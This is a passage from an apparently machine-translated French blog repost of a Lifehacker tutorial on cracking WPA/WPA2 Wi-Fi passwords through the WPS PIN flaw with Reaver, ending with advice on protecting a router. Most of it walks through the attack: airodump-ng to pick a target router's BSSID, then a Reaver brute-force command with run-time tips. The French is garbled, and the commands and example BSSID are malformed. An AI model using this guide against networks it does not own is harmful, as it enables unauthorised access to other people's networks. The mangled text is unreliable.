    Cette commande va afficher le nom de l'interface en mode moniteur, qui vous aurez également besoin de prendre note de. Très probablement, il sera mon0 , comme dans la capture d'écran ci-dessous. Prenez note de cela.

    Trouvez le BSSID du routeur que vous voulez craquer:  Enfin, vous avez besoin d'obtenir l'identifiant unique du routeur que vous essayez de casser afin que vous pouvez pointer Reaver dans la bonne direction. Pour ce faire, exécutez la commande suivante:
    airodump-ng wlan0
    (Remarque: Si airodump-ng wlan0 ne fonctionne pas pour vous, vous pouvez essayer l'interface de l'écran au lieu-par exemple airodump-ng mon0 .)
    Vous verrez une liste des réseaux sans fil à portée physique, fera ressembler à la capture d'écran ci-dessous:



    Quand vous voyez le réseau que vous souhaitez, appuyez sur Ctrl + C pour arrêter la liste de rafraîchissant, puis copiez que le BSSID du réseau (c'est la série de lettres, de chiffres et deux points à l'extrême gauche). Le réseau aurait WPA ou WPA2 figurant dans la colonne ENC. (Si c'est WEP, utilisez notre  précédent guide de craquage de mots de passe WEP ).
    Maintenant, avec le BSSID et le nom d'interface de moniteur en main, vous avez tout ce dont vous avez besoin pour démarrer Reaver.

    Étape 4: Crack d'un réseau WPA passe avec Reaver

    Maintenant, exécutez la commande suivante dans le Terminal, en remplacement de BSSID etmoninterface avec l'interface BSSID et le moniteur et que vous avez copié vers le bas ci-dessus:
    reaver-i moninterface -b BSSID -vv
    Par exemple, si votre interface de moniteur était mon0 comme le mien, et votre BSSID était 8D: AE: 9D: F 65:1: B2 (un BSSID je viens d'inventer), votre commande devrait ressembler à:
    reaver-i mon0-b 8D: AE: 9D: F 65:1: B2-vv
    Appuyez sur Entrée, asseyez-vous, et laissez Reaver travailler sa magie troublante. Reaver va maintenant essayer une série de broches sur le routeur dans une attaque en force brute, l'un après l'autre. Cela va prendre un certain temps. Dans mon test réussi, Reaver a fallu 2 heures et 30 minutes pour casser le réseau et délivre-moi le mot de passe correct. Comme mentionné précédemment, la documentation Reaver dit qu'il peut prendre entre 4 et 10 heures, de sorte qu'il pourrait prendre plus ou moins de temps que j'ai vécu, c'est selon. Lorsque la fissuration de Reaver est terminée, ça va ressembler à ceci:

    Quelques facteurs importants à considérer: Reaver travaillé exactement comme annoncé dans mon test, mais il ne fonctionnera pas nécessairement sur ​​tous les routeurs (voir plus bas). En outre, le routeur vous fissuration besoin d'avoir un signal relativement forte, donc si vous êtes à peine à portée d'un routeur, vous aurez probablement l'expérience de problèmes, et Reaver peut ne pas fonctionner. Tout au long du processus, Reaver serait parfois éprouver un délai d'attente, parfois s'enfermer dans une boucle d'essayer le même code PIN à plusieurs reprises, et ainsi de suite. Je viens de le laisser continuer la course et gardé à proximité du routeur, et finalement il a fait son chemin à travers.
    A noter également, vous pouvez également interrompre votre progression à tout moment en appuyant sur Ctrl + C tandis que Reaver est en marche. Cela va quitter le processus, mais Reaver permettra d'économiser tout progrès afin que la prochaine fois que vous exécutez la commande, vous pouvez reprendre là où vous l'avez laissé, tant que vous n'avez pas éteint votre ordinateur (ce qui, si tu fuis un DVD live, réinitialise tout).

    Comment fonctionne Reaver

    Maintenant que vous avez vu comment utiliser Reaver, jetons un rapide aperçu de la façon dont fonctionne Reaver. L'outil tire parti d'une vulnérabilité dans quelque chose qui s'appelle Protected Setup Wi-Fi, ou WPS. C'est une fonctionnalité qui existe sur de nombreux routeurs, destinés à assurer un processus d'installation facile, et il est lié à un code PIN qui est codée en dur dans le dispositif. Reaver exploite une faille dans ces broches, le résultat est que, avec le temps, il peut révéler votre mot de passe WPA ou WPA2.
    Lire plus de détails sur la vulnérabilité à l'  excellent post de Sean Gallagher sur Ars Technica .

    Comment se protéger contre les attaques Reaver

    Depuis la vulnérabilité réside dans la mise en œuvre de la WPS, votre réseau doit être sûr si vous pouvez simplement désactiver le WPS (ou, mieux encore, si votre routeur ne le supporte pas, en premier lieu).Malheureusement, comme Gallagher  souligne que Ars , même avec WPS manuellement désactivé dans les paramètres de son routeur, Reaver était encore capable de déchiffrer son mot de passe.
    Dans une conversation téléphonique, Craig Heffner a déclaré que l'incapacité de fermer cette vulnérabilité baisse est généralisée. Lui et d'autres ont trouvé que cela se produise avec tous Linksys et Cisco Valet point d'accès sans fil qu'ils ont testés. "Sur tous les routeurs Linksys, vous ne pouvez pas désactiver manuellement WPS», at-il dit. Bien que l'interface Web a un bouton radio qui se seraient hors configuration WPS, "il est toujours en marche et reste vulnérable.
    C'est donc une sorte de poisse. Vous pouvez toujours essayer WPS invalidantes sur votre routeur si vous le pouvez, et de le tester contre Reaver pour voir si ça aide.
    Vous pouvez également configurer le filtrage sur votre routeur (qui ne permet spécifiquement liste blanche appareils de se connecter à votre réseau) adresse MAC, mais un pirate suffisamment avertis pouvaient détecter l'adresse MAC d'un périphérique liste blanche et utiliser l'usurpation d'adresse MAC d'imiter cet ordinateur.
    Double déception. Alors, que va marcher?
    J'ai le firmware du routeur open-source DD-WRT installé sur mon routeur et je n'ai pas pu utiliser Reaver pour casser son mot de passe. Comme il s'avère, DD-WRT ne supporte pas WPS, donc il ya encore une autre raison d'aimer le routeur booster gratuit. Si ça doit vous intéressé par DD-WRT, vérifier leur liste des périphériques supportés pour voir si votre routeur est pris en charge. C'est une bonne mise à jour de sécurité, et DD-WRT peut aussi faire des choses sympas comme surveiller votre utilisation d'Internet, mise en place d'un disque dur réseau, agir comme un bloqueur de publicité dans toute la maison, augmenter la portée de votre réseau Wi-Fi, et plus encore. Il s'avère essentiellement votre 60 $ routeur à un routeur 600 $.
    De: http://lifehacker.com

     
    Geeks Blog © 2012 | Designed by Cheap TVS, in collaboration with Vegan Breakfast, Royalty Free Images and Live Cricket Score